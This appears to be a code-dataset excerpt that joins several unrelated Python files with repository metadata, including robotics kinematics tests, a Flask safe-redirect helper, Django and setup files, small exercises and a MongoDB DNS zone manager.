self.assertRaises(ValueError, panda.jacobm, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.jacobm, [1, 3], 'qwe')
self.assertRaises(
TypeError, panda.jacobm, [1, 3], panda.jacob0(q1), [1, 2, 3])
self.assertRaises(
ValueError, panda.jacobm, [1, 3], panda.jacob0(q1),
np.array([1, 2, 3]))
def test_jacobev(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobev(), pdh.jacobev(q1))
def test_jacob0v(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacob0v(), pdh.jacob0v(q1))
def test_jacobe(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobe(), pdh.jacobe(q1))
nt.assert_array_almost_equal(panda.jacobe(q1), pdh.jacobe(q1))
def test_init(self):
l0 = rp.ELink()
l1 = rp.ELink()
r = rp.ETS([l0, l1], base=sm.SE3.Rx(1.3), base_link=l1, ee_link=l0)
r.base_link = l1
r.base_link = 0
r.ee_link = 1
with self.assertRaises(TypeError):
rp.ETS(l0, base=sm.SE3.Rx(1.3))
with self.assertRaises(TypeError):
rp.ETS([1, 2], base=sm.SE3.Rx(1.3))
def test_dict(self):
panda = rp.PandaURDF()
panda.to_dict()
wx = rp.wx250s()
wx.to_dict()
def test_fkdict(self):
panda = rp.PandaURDF()
fkd = panda.fk_dict()
for i in range(len(panda.ets)):
nt.assert_array_almost_equal(
panda.ets[i]._fk.t,
fkd['links'][i]['t'])
def test_qlim(self):
panda = rp.PandaURDF()
self.assertEqual(panda.qlim.shape[0], 2)
self.assertEqual(panda.qlim.shape[1], panda.n)
def test_manuf(self):
panda = rp.PandaURDF()
self.assertIsInstance(panda.manuf, str)
def test_complex(self):
l0 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRx()])
l1 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRy()], parent=l0)
l2 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRz()], parent=l1)
l3 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Ttx()], parent=l2)
l4 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Tty()], parent=l3)
l5 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Ttz()], parent=l4)
r = rp.ETS([l0, l1, l2, l3, l4, l5])
r.q = [1, 2, 3, 1, 2, 3]
ans = np.array([
[-0., 0.08752679, -0.74761985, 0.41198225, 0.05872664, 0.90929743],
[1.46443609, 2.80993063, 0.52675075, -0.68124272, -0.64287284,
0.35017549],
[-1.04432, -1.80423571, -2.20308833, 0.60512725, -0.76371834,
-0.2248451],
[1., 0., 0.90929743, 0., 0., 0.],
[0., 0.54030231, 0.35017549, 0., 0., 0.],
[0., 0.84147098, -0.2248451, 0., 0., 0.]
])
nt.assert_array_almost_equal(r.jacob0(), ans)
# def test_plot(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False)
# e.close()
# def test_plot_complex(self):
# l0 = rp.ET.TRz()
# l1 = rp.ET.Ttx()
# l2 = rp.ET.TRy()
# l3 = rp.ET.Ttz(1)
# l4 = rp.ET.TRx()
# E = rp.ETS([l0, l1, l2, l3, l4])
# e = E.plot(block=False)
# e.step(0)
# e.close()
# def test_teach(self):
# l0 = rp.ET.TRz()
# l1 = rp.ET.Ttx()
# l2 = rp.ET.TRy()
# l3 = rp.ET.Ttz(1)
# l4 = rp.ET.TRx()
# E = rp.ETS([l0, l1, l2, l3, l4])
# e = E.teach(block=False, q=[1, 2, 3, 4])
# e.close()
# def test_plot_traj(self):
# panda = rp.Panda()
# q = np.random.rand(7, 3)
# e = panda.plot(block=False, q=q, dt=0)
# e.close()
def test_control_type2(self):
panda = rp.Panda()
panda.control_type = 'p'
with self.assertRaises(ValueError):
panda.control_type = 'z'
# def test_plot_vellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot_vellipse(block=False, limits=[1, 2, 1, 2, 1, 2])
# e.close()
# e = panda.plot_vellipse(
# block=False, q=panda.qr, centre='ee', opt='rot')
# e.step(0)
# e.close()
# with self.assertRaises(TypeError):
# panda.plot_vellipse(vellipse=10)
# with self.assertRaises(ValueError):
# panda.plot_vellipse(centre='ff')
# def test_plot_fellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot_fellipse(block=False, limits=[1, 2, 1, 2, 1, 2])
# e.close()
# e = panda.plot_fellipse(
# block=False, q=panda.qr, centre='ee', opt='rot')
# e.step(0)
# e.close()
# with self.assertRaises(TypeError):
# panda.plot_fellipse(fellipse=10)
# with self.assertRaises(ValueError):
# panda.plot_fellipse(centre='ff')
# def test_plot_with_vellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False, vellipse=True)
# e.close()
# def test_plot_with_fellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False, fellipse=True)
# e.close()
# def test_plot2(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot2(block=False, name=True)
# e.close()
# def test_plot2_traj(self):
# panda = rp.Panda()
# q = np.random.rand(7, 3)
# e = panda.plot2(block=False, q=q, dt=0)
# e.close()
# def test_teach2(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.teach(block=False)
# e.close()
# e2 = panda.teach2(block=False, q=panda.qr)
# e2.close()
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
88bd31ecc6bd237466ec96a185b1d943f4ead144 | 2d060eb9c7126b8963adcad857daa6e39c6ac75f | /Resist.py | 12e4f998383248c49443c1a4b9fc74c578754390 | [] | no_license | easy-rpg/Filler | 43ce36980156f4ffd9597d822e9fa6c19105d892 | 55cddbbb21ac508f64b98ceedbc30c680d4c4951 | refs/heads/master | 2020-03-15T01:38:51.069870 | 2016-09-03T07:12:55 | 2016-09-03T07:12:55 | 131,898,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | import abc
class Resist_Boa(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [2, 3, 3, 4, 4, 5, 5, 6, 6, 7, 7, 8, 8, 9, 9, 10, 10, 11, 11, 12]
@abc.abstractmethod
def __str__(self):
raise NotImplementedError('users must define __str__ to use this base class')
class Resist_Ruim(object):
"""docstring for """
__metaclass__ = abc.ABCMeta
valores = [0, 0, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 5, 5, 5, 6, 6, 6]
@abc.abstractmethod
def __str__(self):
raise NotImplementedError('users must define __str__ to use this base class') | [
"[email protected]"
] | |
1c29302c75eba77721ac08ae1689249996414741 | 5864e86954a221d52d4fa83a607c71bacf201c5a | /eve/client/script/ui/station/fitting/stanceSlot.py | 4f84e19f8e8023622408b00954931ab6ab6a422f | [] | no_license | connoryang/1v1dec | e9a2303a01e5a26bf14159112b112be81a6560fd | 404f2cebf13b311e754d45206008918881496370 | refs/heads/master | 2021-05-04T02:34:59.627529 | 2016-10-19T08:56:26 | 2016-10-19T08:56:26 | 71,334,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,646 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\ui\station\fitting\stanceSlot.py
from carbonui.primitives.container import Container
from eve.client.script.ui.inflight import shipstance
import carbonui.const as uiconst
class StanceSlots(Container):
def __init__(self, **kw):
super(StanceSlots, self).__init__(**kw)
def _GetAngles(self):
return [ 258 - i * 10 for i in xrange(3) ]
def ApplyAttributes(self, attributes):
Container.ApplyAttributes(self, attributes)
self.controller = attributes.controller
typeID = attributes.typeID
if typeID is None:
typeID = sm.GetService('invCache').GetInventoryFromId(attributes.shipID).GetItem().typeID
self.shipstances = []
for angle in self._GetAngles():
pos = attributes.angleToPos(angle)
newPos = (pos[0],
pos[1],
32,
32)
self.shipstances.append(shipstance.ShipStanceFittingButton(shipID=attributes.shipID, typeID=typeID, parent=self, pos=newPos, align=uiconst.TOPLEFT, controller=self.controller))
def ShowStances(self, shipID, typeID):
btnControllerClass = self.controller.GetStanceBtnControllerClass()
shipStanceButtonsArgs = btnControllerClass().get_ship_stance_buttons_args(typeID, shipID)
for idx, kwargs in enumerate(shipStanceButtonsArgs):
stanceButton = self.shipstances[idx]
stanceButton.SetAsStance(shipID, typeID, kwargs['stanceID'], kwargs['stance'])
def GetStanceContainers(self):
return self.shipstances
| [
"[email protected]"
] | |
09da3887cf75a54b9d1965126cebae0ddf5f6475 | 6929f9696a8f90b3778d449a199cee8891f3f739 | /python_core/deligating_to_parent_class_and_slots.py | c23b6fab9843575d3946b69e50da5f32471b0dc8 | [] | no_license | chemplife/Python | 881d492a4271fb2b423f2dd611eaac53a0efdc34 | 7fdfbf442a915e4f41506503baad4345a52d1e86 | refs/heads/master | 2022-12-31T20:00:22.475985 | 2020-10-19T20:14:43 | 2020-10-19T20:14:43 | 305,503,403 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,720 | py | '''
super().method()/attribute
-> To deligate things back to the parent class.
-> Use this only when you have the same named function in the child as well.. Because Python anyways will look uo the heirarchy
if it does not find the method in Child-class.
Eg: class A:
def b():
class B(A):
def c():
return self.b() <- is same as -> return super().b() <- Because 'class B'' does not have 'def b()' of its own.
self: binds the instance of the object to the method anywhere in the herarchy.
** if the 'Parent-Class' has '__init__(seld, name)' method that takes in an argument and the 'Child-Class' does not have a '__init__(self)' defined:
-> 'Child-Class' instance need that argument (name) because it is inheritied from the 'Parent Class'
'''
class Person:
def hello(self):
print('In Person Class: ', self)
class Student(Person):
def hello(self):
print('In Student Class: ', self)
super().hello()
p = Person()
s = Student()
p.hello()
print('\n')
# Looks at the address of 'self'.. it is the same in 'Person Class' as it is for 'Student Class'
s.hello()
print('\n\n-------------------------------- Combined Example: Property/Inheritance/Deligate/Caching --------------------------------')
from math import pi
from numbers import Real
class Circle:
def __init__(self, r):
self.radius = r
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
@radius.setter
def radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle(Circle):
def __init__(self):
super().__init__(1)
u = UnitCircle()
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#But this will work..
u.radius = 10
print('\nProblem: UnitCircle Radius:', u.radius)
# To make the Radius for Unit-Circle read-only..
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
return self.radius # return super().radius ;; will work the same.
# Now it will not work... even without setting u1.radius=10.. Because now, the 'self.radius' in 'circle.__init__()' does not take any argument.
# ** we cannot call the 'radius.setter' from outside of the class.
# u1 = UnitCircle_1()
# u1.radius = 10
# print('\nProblem: UnitCircle_1 Radius:', u1.radius)
# To fix, this, we need to make the 'self.radius' in 'circle.__init__()' call a method to set radius..
class Circle:
def __init__(self, r):
self._set_radius(r)
self._area = None
self._perimeter = None
@property
def radius(self):
return self._r
def _set_radius(self, r):
if isinstance(r, Real) and r > 0:
self._r = r
self._area = None
self._perimeter = None
else:
raise ValueError('Radius must be a Positive Real Number.')
@radius.setter
def radius(self, r):
self._set_radius(r)
@property
def area(self):
if self._area is None:
self._area = pi * self.radius **2
return self._area
@property
def perimeter(self):
if self._perimeter is None:
self._perimeter = 2 * pi * self.radius
return self._perimeter
class UnitCircle_1(Circle):
def __init__(self):
super().__init__(1)
@property
def radius(self):
return super().radius
u = UnitCircle_1()
print('\n')
print('UnitCircle Radius:', u.radius)
print('UnitCircle Area:', u.area)
print('UnitCircle Perimeter:', u.perimeter)
#Now this will not work..
# u.radius = 10
# print('\nProblem: UnitCircle Radius:', u.radius)
print('\n\n------------------------------------------- Slots -------------------------------------------\n')
'''
Class inherently use 'DICTIONARY' to store all the attributes.
But when we have a lot of instances of the class.. it will create a lot of memory-overhead..
To do it in a better 'memory-efficient-way'.. SLOTS are used
Slots- more compact datastructe that Python.
We need to tell slots what all attributes we will have in advance.
__slots__ = ('x', 'y')
('x', 'y') -> Iterable..
__slots__ -> tells Python that don't use dictionary.. use slots..
Now, Both of these will give error
-> obj.__dict__ : Attribute Error
-> vars(obj) : Tyoe Error
But -> dir(obj) : will tell us about 'x' and 'y'
Slots V/S Dict
-> Slots are 'Memory-Effecient' : Save 10 times the memory compared to Dict.
-> Slots are 'Time-Effecient' : Runs 30% faster then Dict.
-> Slots: Cannot add attributes (Monkey-Patching) during the program.. Dict, we can add attributes on the fly..
'''
class Location:
__slots__ = 'name', '_longitude', '_latitude'
def __init__(self, name, *, longitude, latitude):
self._longitude = longitude
self._latitude = latitude
self.name = name
@property
def longitude(self):
return self._longitude
@property
def latitude(self):
return self._latitude
print('Location Dict: ', Location.__dict__)
Location.map_service = 'Google Maps'
print('\nLocation Dict after Attribute Addition: ', Location.__dict__)
#But we don't have Instance-Dictionary
l = Location('Delhi', longitude=100, latitude=72)
# print('\nLocation Instance Dict: ', l.__dict__)
print('\n\n--------------------------- Slots with Single Inheritance ---------------------------\n')
'''
-> 'Child-Class' will use the 'slots' FROM 'Parent-Class' if present. But 'Child-Class' will have its own '__dict__' to store attributes.
-> 'Child-Class' can have 'slots' even if 'Parent-Class' DON'T have it. 'Child-Class' will still have a '__dict__' to store attributes.
-> If Child-Class also needs to have 'Slots', mention those in the 'Child-Class' which are not in 'Parent-Class'.. Don't re-mention attributes.
-> If re-mentioned:
-> In future updates from Python it will break (It is marked to have a 'check-on' in future.)
-> It hides the Parent Attribute and can cause problems.
-> Increase memeory overhead due to re-mentioning..
************************
How to use both 'Slots' and '__dict__'?
-> __slots__ = 'attributes', .. , '__dict__'
-> Now, we can add more attributes during run-time.. (__dict__ is not dropped..)
-> Nowly added attributes will get stored in '__dict__' and not in 'slots'
'''
class Person:
__slots__ = 'name'
class Student(Person):
pass
p = Person()
s = Student()
s.name = 'Alex'
print('Student Instance Dict: ', s.__dict__)
s.age = 18
print('\nStudent Instance Dict: ', s.__dict__)
# This will not work
#print('Person Instance Dict: ', p.__dict__)
| [
"[email protected]"
] | |
d022d56454d570a5b887704c79d4d2843271f345 | 576cc83449e10fd3f98281970c46016ea7a5aea2 | /OpenCV拟合与特征点识别/模板匹配角度.py | 78abfbc17a54a507b14bd408976b16d378badf18 | [] | no_license | HotView/PycharmProjects | 215ab9edd341e3293daebcf86d97537f8cd28d75 | 61393fe5ba781a8c1216a5cbe7e0d06149a10190 | refs/heads/master | 2020-06-02T07:41:53.608742 | 2019-11-13T08:31:57 | 2019-11-13T08:31:57 | 191,085,178 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 171 | py | import math
a = math.atan(2/3)
c = math.atan(1)
print(c*180/math.pi)
print(a*180/math.pi)
#theta1 =math.tanh((a))
#print(theta1)
b = math.atan(6/2)
print(b*180/math.pi)
| [
"[email protected]"
] | |
cce1e5cc0fba01f33051132e3981e03cec379801 | a070182e6443995031340802e74d1e65a85bdca3 | /bluelog/utils.py | 4975d944d9c5eebe4486d47ab3fea78ee7fa681c | [] | no_license | huazhicai/bluelog | f86a042a5f3ada46515920c45a0b1452a40d4ad9 | c2a46ac25cbba4ecf7d4e0985ef9010ddae34c01 | refs/heads/master | 2020-04-04T16:33:27.910658 | 2019-01-03T09:59:52 | 2019-01-03T09:59:52 | 156,082,797 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | try:
from urlparse import urlparse, urljoin
except ImportError:
from urllib.parse import urlparse, urljoin
from flask import request, redirect, url_for
def is_safe_url(target):
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def redirect_back(default='blog.index', **kwargs):
for target in request.args.get('next'), request.referrer:
if not target:
continue
if is_safe_url(target):
return redirect(target)
return redirect(url_for(default, **kwargs))
| [
"[email protected]"
] | |
d69a39808d6f68572bc01c15f5e876462397f0eb | 4dac40a30e7bbb86ab829fed0cb6f12ff7fa0216 | /djwiki/wiki/models.py | 0e7d732c83f68d3e3e9fb72063d8346168ff24ae | [] | no_license | gzpgg3x/pythonDiary | cc039b716c810f99d5a12b0f4167a711cd6ea18f | 0c3af53dc635d5ff40adad89dce146d6684e162e | refs/heads/master | 2021-01-10T19:55:41.130511 | 2013-04-21T04:37:10 | 2013-04-21T04:37:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 201 | py | from django.db import models
class Page(models.Model):
name = models.CharField(max_length=40, unique=True)
content = models.TextField()
def __unicode__(self):
return self.name | [
"[email protected]"
] | |
26952bdc611861509bd368811c1b243e394f7d45 | a32049cdf8cb3403e8e54ddd661f8bb506cca99b | /first_project/first_app/urls.py | f627fd5ffdf7c929f3138c22f3c628b8dc0cf27b | [] | no_license | akhileshvvn/django-deployment-example | 5a3beb8205f2905c99808e983baaf0f8a7a23772 | 45317bb6166527054541e52c8a986f44342ea958 | refs/heads/master | 2022-04-15T08:17:02.615307 | 2020-04-11T07:54:19 | 2020-04-11T07:54:19 | 254,815,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 501 | py | from django.urls import path,re_path
from django.conf.urls import url
from . import views
#TEMPLATE TAGGING
app_name = 'first_app'
urlpatterns = [
re_path(r'^index/', views.index, name=''),
re_path(r'formindex/',views.form_name_view,name='form_name'),
re_path(r'^relative/$',views.relative,name = 'relative'),
re_path(r'^other/$',views.other,name='other'),
re_path(r'^register/$',views.register,name='register'),
re_path(r'^user_login/$',views.user_login,name='user_login')
] | [
"[email protected]"
] | |
7e5fc8246ba12f67b9efe8fe1433a80bbd6460fe | d4fe66ef7b5bc1745aeb4054b30575fb25a053f4 | /setup.py | d838e226a7de7b9cd782061fb6f64b3134bc06cc | [
"Apache-2.0"
] | permissive | jay-johnson/antinex-client | 796c753bc9df8498f25dca994920b26d8828a940 | 76a3cfbe8a8d174d87aba37de3d8acaf8c4864ba | refs/heads/master | 2021-04-15T15:55:39.670061 | 2020-09-04T19:49:15 | 2020-09-04T19:49:15 | 126,577,469 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,053 | py | import os
import sys
import warnings
import unittest
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', "Arguments to pass to pytest")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ''
def run_tests(self):
import shlex
# import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(shlex.split(self.pytest_args))
sys.exit(errno)
"""
https://packaging.python.org/guides/making-a-pypi-friendly-readme/
check the README.rst works on pypi as the
long_description with:
twine check dist/*
"""
long_description = open('README.rst').read()
cur_path, cur_script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(cur_path))
install_requires = [
"colorlog",
"coverage",
"flake8",
"matplotlib",
"numpy",
"pandas",
"pep8",
"pipenv",
"pycodestyle",
"pylint",
"recommonmark",
"requests",
"seaborn",
"sphinx",
"sphinx-autobuild",
"sphinx_rtd_theme",
"spylunking",
"tox",
"tqdm",
"unittest2",
"mock"
]
if sys.version_info < (3, 5):
warnings.warn(
"Less than Python 3.5 is not supported.",
DeprecationWarning)
# Do not import antinex_client module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "antinex_client"))
setup(
name="antinex-client",
cmdclass={"test": PyTest},
version="1.3.6",
description=("AntiNex Python client"),
long_description_content_type='text/x-rst',
long_description=long_description,
author="Jay Johnson",
author_email="[email protected]",
url="https://github.com/jay-johnson/antinex-client",
packages=[
"antinex_client",
"antinex_client.scripts",
"antinex_client.log"
],
package_data={},
install_requires=install_requires,
test_suite="setup.antinex_client_test_suite",
tests_require=[
"pytest"
],
scripts=[
"./antinex_client/scripts/ai",
"./antinex_client/scripts/ai_env_predict.py",
"./antinex_client/scripts/ai_get_prepared_dataset.py",
"./antinex_client/scripts/ai_get_job.py",
"./antinex_client/scripts/ai_get_results.py",
"./antinex_client/scripts/ai_prepare_dataset.py",
"./antinex_client/scripts/ai_train_dnn.py"
],
use_2to3=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
])
| [
"[email protected]"
] | |
63f124f199d2e152e2fc67618693c424f3febbb7 | d458b72b4d0e5c51446bb8b9f8a6276015dfb594 | /math/0x02-calculus/10-matisse.py | 88cf330d9c797d23e8f981fda83e54f60879e7f5 | [] | no_license | mecomontes/Machine-Learning-projects | d6588cfaa7d020d3fae0fb74f6550c9e84500578 | 50e1828b58bb58eecfd3a142501b37fe701f4e49 | refs/heads/main | 2023-07-14T12:30:19.792332 | 2021-08-29T15:33:16 | 2021-08-29T15:33:16 | 376,129,791 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 8 9:34:16 2020
@author: Robinson Montes
"""
def poly_derivative(poly):
"""
Function that find the derivate of a polynomial
Arguments:
- poly(list of integers): polynomial to calculate the derivate
Return:
List of coefficients representing the derivative of the polynomial
"""
if poly is None or poly == [] or type(poly) is not list:
return None
derivate = []
i = 0
while i < len(poly):
if type(poly[i]) not in (int, float):
return None
elif len(poly) == 1:
derivate.append(0)
else:
if i == 0:
i += 1
continue
derivate.append(poly[i]*i)
i += 1
return derivate
| [
"[email protected]"
] | |
b49d41c660d323470c0b91f8b0625757281eccd0 | 1be96ee96f3b33469ca073c4f32884cb7230106b | /python3_cron_scripts/libs3/ZoneManager.py | 0531dbedb4a08f885bbf76e4b6fa355e672c65fc | [
"Apache-2.0"
] | permissive | vishnurajkv/Marinus | 3305478038fba8b0ea15dafa2219df9f4df21e9b | 331ba1dc2e99ae99df6c9d93063a852eec41d578 | refs/heads/master | 2020-06-29T10:58:50.196807 | 2019-07-26T20:48:47 | 2019-07-26T20:48:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,583 | py | #!/usr/bin/python3
# Copyright 2018 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""
This class mostly exists because almost every script needs to do a get_distinct_zones
Having it centralized, means that the included and excluded status' can be managed in one place.
"""
from pymongo import MongoClient
from datetime import datetime
from tld import get_fld
class ZoneManager(object):
# A status of confirmed typically means it was entered by a human
CONFIRMED = "confirmed"
# A status of unconfirmed means that it was added via automation
# It has not been revied by a human
UNCONFIRMED = "unconfirmed"
# A status of false positive means that a human identified that automation made a mistake
FALSE_POSITIVE = "false_positive"
# A status of expired means that the automation believes that the domain is no longer registered
EXPIRED = "expired"
# The MongoConnector
mongo_connector = None
# The zone collection
zone_collection = None
def __init__(self, mongo_connector):
"""
Initialize the MongoDB Connector
"""
self.mongo_connector = mongo_connector
self.zone_collection = mongo_connector.get_zone_connection()
def _check_valid_status(self, status):
if status != ZoneManager.EXPIRED and status != ZoneManager.FALSE_POSITIVE and \
status != ZoneManager.CONFIRMED and status!= ZoneManager.UNCONFIRMED:
print("ERROR: Bad status value")
return False
return True
@staticmethod
def get_distinct_zones(mongo_connector, includeAll = False):
"""
This is the most common usage of get zones where the caller wants just the list of
active zones.
This returns the list of zones as an array of strings rather than the complete JSON objects
"""
zones_collection = mongo_connector.get_zone_connection()
if includeAll:
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone')
else:
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone', {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone.find(".") >= 0:
zones.append(zone)
return zones
@staticmethod
def get_reversed_zones(mongo_connector):
"""
Retrieve the list of active zones and then reverse them to match the Common Crawl format
"""
zones_collection = mongo_connector.get_zone_connection()
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone', {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone.find("."):
zone_parts = zone.split(".")
# The vertices.txt entries from common_crawl are in reverse order (e.g. org.example.www)
# To string match faster, the zones are stored in a reverse format prior to matching.
# This avoids having to reverse each entry in the file which is less efficient.
rev_zone = ""
for part in zone_parts:
rev_zone = part + "." + rev_zone
rev_zone = rev_zone[:-1]
zones.append(rev_zone)
return zones
@staticmethod
def get_zones_by_source(mongo_connector, source, includeAll=False):
"""
Returns a list of zones based on the provided reporting source
"""
zone_collection = mongo_connector.get_zone_connection()
if includeAll:
zones = mongo_connector.perform_distinct(zone_collection, 'zone', {
'reporting_sources.source': source})
else:
zones = mongo_connector.perform_distinct(zone_collection, 'zone', {
'reporting_sources.source': source,
'status': {'$nin': [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
return zones
@staticmethod
def get_zones(mongo_connector, includeAll=False):
"""
This is will return the full zones object for all active zones.
This returns the complete json objects for the matching descriptions
"""
zones_collection = mongo_connector.get_zone_connection()
if includeAll:
zone_results = mongo_connector.perform_find(zones_collection, {})
else:
zone_results = mongo_connector.perform_find(zones_collection, {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone['zone'].find(".") >= 0:
zones.append(zone)
return zones
@staticmethod
def get_root_domain(value, zone=None):
"""
Get the root domain (FLD) for the provided value
"""
res = get_fld(value, fix_protocol=True, fail_silently=True)
if res is None:
return zone
return res
def get_zone(self, zone):
"""
Fetch the full individual zone record.
This is not a staticmethod since it would probably be called repeatedly.
"""
return self.mongo_connector.perform_find(self.zone_collection, {'zone': zone})
def get_zones_by_status(self, status):
"""
This returns the list of zones associated with the provided status.
This returns the list of zones as an array of strings rather than the complete JSON objects
"""
if not self._check_valid_status(status):
return
zone_results = self.mongo_connector.perform_distinct(self.zone_collection, 'zone', {'status': status})
zones = []
for zone in zone_results:
if zone.find(".") >= 0:
zones.append(zone)
return zones
def set_status(self, zone, status, caller):
"""
Set a zone to expired.
"""
if self.zone_collection.find({'zone': zone}).count() == 0:
print("ERROR: Invalid zone!")
return
if status != ZoneManager.EXPIRED and status != ZoneManager.FALSE_POSITIVE and \
status != ZoneManager.CONFIRMED and status!= ZoneManager.UNCONFIRMED:
print("ERROR: Bad status value!")
return
if caller is None or caller == "":
print("ERROR: Please provide a caller value!")
return
now = datetime.now()
note = caller + " set to " + status + " on " + str(now)
self.zone_collection.update({"zone": zone}, {"$set": {"status": status, "updated": now}, "$addToSet": {"notes": note}})
def add_note(self, zone, note):
"""
In the future, there should probably be restrictions on note length.
For now, it is not set until more information on usage is available.
"""
self.zone_collection.update({"zone": zone}, {"$addToSet": {"notes": note}})
| [
"[email protected]"
] | |
33302759c219b9a3b1fe2347ecb502a4dace1d4d | fc0150b1fd6ba0efd6746a34ffa8cba01640d10e | /Programming Basics with Python - април 2018/04. Complex-Conditions/02. Small Shop.py | f98d0d795257e24d58dfce9db983b1cd9ca6dbeb | [] | no_license | vgrozev/SofUni_Python_hmwrks | 7554d90f93b83d58e386c92dac355573c8cda848 | b10a941a0195ea069e698b319f293f5b4a660547 | refs/heads/master | 2021-06-08T19:40:27.009205 | 2019-11-24T17:19:31 | 2019-11-24T17:19:31 | 95,629,443 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,132 | py | product = input().lower()
town = input().lower()
quantity = float(input())
total = 0.0
if town == 'sofia':
if product == 'coffee':
total = quantity * 0.50
elif product == 'peanuts':
total = quantity * 1.60
elif product == 'beer':
total = quantity * 1.20
elif product == 'water':
total = quantity * 0.80
else: # product == 'sweets'
total = quantity * 1.45
elif town == 'plovdiv':
if product == 'coffee':
total = quantity * 0.40
elif product == 'peanuts':
total = quantity * 1.50
elif product == 'beer':
total = quantity * 1.15
elif product == 'water':
total = quantity * 0.70
else: # product == 'sweets'
total = quantity * 1.30
else: # town == 'Varna'
if product == 'coffee':
total = quantity * 0.45
elif product == 'peanuts':
total = quantity * 1.55
elif product == 'beer':
total = quantity * 1.10
elif product == 'water':
total = quantity * 0.70
else: # product == 'sweets'
total = quantity * 1.35
print("{0:.2f}".format(total))
| [
"[email protected]"
] | |
2d6e5705b0d6fc9452a7eef4f715005355db0acf | 0067290f8a2c5c367eee2e76f7ec743719d5b59c | /one/two/migrations/0002_auto_20170802_1924.py | 02ba77ac66799d0a3867254c03ad5115c12deb5d | [] | no_license | 8880/Django | d81da8f410845676606eb148a609f56792a14b1b | 469fe07475c2f7c6e2d1ba1e2119b59550f154e6 | refs/heads/master | 2021-01-16T17:54:58.393384 | 2017-08-19T02:55:11 | 2017-08-19T02:55:11 | 100,019,134 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,264 | py | # -*- coding: utf-8 -*-
